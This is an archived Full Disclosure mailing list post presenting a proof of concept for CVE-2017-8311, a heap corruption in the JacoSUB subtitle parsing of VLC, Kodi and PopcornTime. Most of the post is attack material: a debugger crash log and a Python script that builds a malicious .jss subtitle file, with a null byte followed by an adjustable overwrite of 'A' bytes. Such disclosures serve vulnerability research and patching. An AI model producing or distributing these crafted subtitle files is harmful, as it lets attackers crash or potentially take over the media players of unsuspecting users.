| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <E0HnYDgc4jaC1mXMtRGaHN7TRhGuypizkTAhb1gJqJA6HAmr-Y-Grm7V4ECemJY--9ffgDd65LyKvdjHy_iEbv0jgEbXLZfqdNwEWM54Hiw=@protonmail.ch>
Date: Sun, 22 Apr 2018 07:29:07 -0400
From: Kroppoloe via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory
Corruption (PoC)
> ‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐
> On 22 April 2018 4:27 AM, Kroppoloe <kroppoloe@...tonmail.ch> wrote:
>
>> """
>> VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
>> Author: SivertPL (kroppoloe@...tonmail.ch)
>> CVE: CVE-2017-8311
>>
>> Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
>> This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
>> The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
>> I want to join a research team.
>> """
>>
>> """
>> ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
>> ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
>> ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
>> ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
>> ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
>> ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
>> ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
>> core demux error: option sub-original-fps does not exist
>> (33c.d10): Access violation - code c0000005 (first chance)
>> First chance exceptions are reported before any exception handling.
>> This exception may be expected and handled.
>> *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
>> libsubtitle_plugin+0x44de:
>> 715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
>> 0:012:x86> g
>> (33c.d10): Access violation - code c0000005 (!!! second chance !!!)
>> wow64!Wow64NotifyDebugger+0x1d:
>> 00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
>> """
>>
>> import os
>> import struct
>> import sys
>> import argparse
>>
>> len = 1025
>>
>> def main(argv):
>> parser = argparse.ArgumentParser()
>> parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
>> parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
>> args = parser.parse_args()
>> if args.length:
>> global len
>> len = args.length
>> print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
>> write(args.filename, len)
>>
>> def write(name, len):
>> subtitles = open("%s.jss" % name, "w+")
>> subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
>> subtitles.write("0:00:04.00 0:00:05.00 vm attack")
>> subtitles.write("\\C")
>> subtitles.write(struct.pack('B', 0))
>> subtitles.write('A' * len)
>> subtitles.close()
>> print "[+] Done!"
>>
>> if __name__ == "__main__":
>> main(sys.argv[1:])
View attachment "red_chimera.py" of type "text/plain" (3050 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists